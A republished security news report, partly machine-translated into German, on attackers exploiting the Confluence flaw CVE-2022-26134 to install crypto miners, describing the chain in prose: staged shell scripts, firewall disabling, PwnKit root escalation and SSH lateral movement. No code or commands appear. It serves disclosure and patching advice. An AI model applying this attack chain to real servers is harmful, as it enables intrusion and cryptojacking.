Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners

A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.

“If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment information stealers, remote access trojans (RATs), and ransomware,” Trend Micro threat researcher Sunil Bharti sagte in a report.

Das Thema, verfolgt als CVE-2022-26134 (CVSS score: 9.8), was addressed by the Australian software company in June 2022.

In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script (“ro.sh”) on the victim’s machine, which, in turn, fetched a second shell script (“ap.sh”).

The malicious code is designed to update the PATH variable to include additional paths such as “/tmp”, download the cURL utility (if not already present) from a remote server, disable iptables firewall, abuse the PwnKit flaw (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto miner.

Like other cryptojacking attacks, the shell script also terminates other competing coin miners, disables cloud service provider agents from Alibaba and Tencent, before carrying out lateral movement via SSH.

The findings mirror similar exploitation attempts previously disclosed by Lacework, Microsoft, Sophosund Akamai in June.

Lacework’s analysis further shows that the command-and-control (C2) server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named “kik” that enables the malware to kill processes of interest.

Users are advised to prioritize patching the flaw as it could be abused by threat actors for other nefarious purposes.

“Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself,” Bharti said.

https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html?

Kommentar verfassen Kommentieren abbrechen

London, GB

2:56 am, Juli 9, 2025

14°C

L: 12° | H: 16°

Fühlt sich an wie 13°C° wenige Wolken

Luftfeuchtigkeit: 74 %

Druck: 1020 mb

Wind: 2 mph NW

Windböe: 3 mph

UV-Index: 0

Niederschlag: 0 mm

Wolken: 14%

Regen Chance: 0%

Sichtbarkeit: 10 km

Sonnenaufgang: 4:54 am

Sonnenuntergang: 9:16 pm

TäglichStündlich

Tägliche VorhersageStündliche Vorhersage

Today 10:00 pm

12° | 16°°C 0.03 mm 3% 7 mph 74 % 1022 mb 0 mm/h

Tomorrow 10:00 pm

18° | 29°°C 0 mm 0% 8 mph 71 % 1023 mb 0 mm/h

Fr. Juli 11 10:00 pm

19° | 29°°C 0 mm 0% 8 mph 62 % 1022 mb 0 mm/h

Sa. Juli 12 10:00 pm

19° | 30°°C 0 mm 0% 10 mph 63 % 1019 mb 0 mm/h

So. Juli 13 10:00 pm

18° | 31°°C 0 mm 0% 9 mph 70 % 1018 mb 0 mm/h

Today 4:00 am

14° | 14°°C 0 mm 0% 2 mph 74 % 1020 mb 0 mm/h

Today 7:00 am

15° | 16°°C 0 mm 0% 3 mph 67 % 1020 mb 0 mm/h

Today 10:00 am

19° | 22°°C 0 mm 0% 4 mph 54 % 1021 mb 0 mm/h

Today 1:00 pm

24° | 24°°C 0 mm 0% 6 mph 49 % 1021 mb 0 mm/h

Today 4:00 pm

26° | 26°°C 0.03 mm 3% 7 mph 42 % 1021 mb 0 mm/h

Today 7:00 pm

25° | 25°°C 0 mm 0% 3 mph 43 % 1021 mb 0 mm/h

Today 10:00 pm

22° | 22°°C 0 mm 0% 3 mph 57 % 1022 mb 0 mm/h

Tomorrow 1:00 am

20° | 20°°C 0 mm 0% 3 mph 62 % 1022 mb 0 mm/h

Name	Preis	24H (%)
Bitcoin(BTC)	€92,776.00	0.79%
Ethereum(ETH)	€2,220.58	2.89%
Fesseln(USDT)	€0.85	0.01%
XRP(XRP)	€1.97	2.06%
Solana(SOL)	€129.15	1.53%
USDC(USDC)	€0.85	0.01%
Dogecoin(DOGE)	€0.145230	2.09%
Shiba Inu(SHIB)	€0.000010	1.72%
Pepe(PEPE)	€0.000009	2.27%

Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners

Teilen:

Kommentar verfassen Kommentieren abbrechen

Verbindung zum Dienstprogramm

Nützlicher Link

Newsletter

Folgen Sie uns